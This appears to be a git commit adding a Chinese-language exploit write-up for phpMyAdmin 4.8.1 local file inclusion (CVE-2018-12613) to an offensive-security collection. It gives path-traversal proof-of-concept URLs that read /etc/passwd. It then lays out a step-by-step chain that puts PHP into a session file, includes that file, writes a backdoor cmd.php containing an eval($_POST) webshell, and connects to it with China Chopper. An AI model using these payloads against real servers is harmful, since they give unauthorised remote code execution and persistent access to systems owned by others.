add phpMyAdmin v4.8.1 本地文件包含 到写入webshell

This commit is contained in:
helloexp 2022-03-01 16:11:59 +08:00
parent 0d31d13d0b
commit 5fe4630757
7 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
# phpMyAdmin v4.8.1 本地文件包含 到写入webshell
> CVE 编号: CVE-2018-12613
## poc
```shell script
http://xxxx.com/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
```
## poc2
```shell script
http://xxxx.com/index.php?target=sql.php?/../../../../../../../../../etc/passwd
```
## 写入webshell 利用
1. 执行sql 语句 `SELECT "<?php phpinfo();?>"`
2. 包含session 文件
![session](images/session.png)
`/index.php?target=sql.php?/../../../../../../../../../tmp/sess_7600504195960fdd23197b847708a866
`
包含session 文件出现phpinfo
![session](images/phpinfo.png)
从phpinfo中搜索`CONTEXT_DOCUMENT_ROOT `可查看web路径
![webpaht](images/webpath.png)
3. 写入webshell
```sql
select "<?php file_put_contents('/var/www/html/cmd.php','<?php @eval($_POST[pass]);?>')?>"
```
访问 cmd.php 文件已经存在,说明写入成功
![cmd.php](images/cmd.png)
4. 菜刀添加webshell
![shell1](images/shell1.png)
![shell2](images/shell2.png)

Binary file not shown.

After

Width:  |  Height:  |  Size: 13 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 152 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 80 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 135 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 20 KiB